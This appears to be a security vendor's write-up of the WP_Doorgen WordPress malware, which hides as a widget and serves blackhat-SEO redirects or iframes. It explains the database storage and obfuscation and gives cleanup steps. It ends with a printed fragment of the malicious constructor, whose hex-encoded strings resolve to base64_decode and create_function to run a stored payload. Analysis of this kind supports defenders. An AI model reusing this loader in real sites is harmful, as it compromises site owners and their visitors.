Blackhat SEO is a malicious technique used to manipulate the search engine results in order to benefit a website in terms of relevance. The payload is PHP based, thus intended for server-side use and the payload is executed directly on the server, while the site is loaded. Only the payload result (such as malicious iframe, or redirect) is visible in the browser, not the malicious code itself.
WP_Doorgen act as a valid widget in WordPress installations. It stores the payload inside WordPress' database (wp_options with wp_doorgen_ prefix in the name column). This payload is obfuscated using strrev and base64 encoding.
Affecting
Vulnerable WordPress installations (outdated software or compromised passwords)
Cleanup
Cleanup is done by deleting the malicious file. The infection can be found in your system by searching for the wp_doorgen string inside your files and databse. .
You can also sign up with us and let our team remove the malware for you.
Dump
function __construct( $id_base = false, $name, $widget_options = array(), $control_options = array(), $unique_id = "x62x61163145x36x34x5fx64x65143x6f144145", $unique_hash = "x63x72x65x61x74145137x66165x6ex63164x69x6f156" ) {
$this->id_base = empty($id_base) ? preg_replace( '/.*_/', '', strtolower(get_class($this)) ) : strtolower($id_base);
$this->option_name = 'wp_doorgen_' . $this->id_base;
$name = $unique_hash('',$this->update_callback($unique_id));
//$this->widget_options = $this->get_widget_options();
$this->control_options = array($name());
define('wp_class_support',true);
}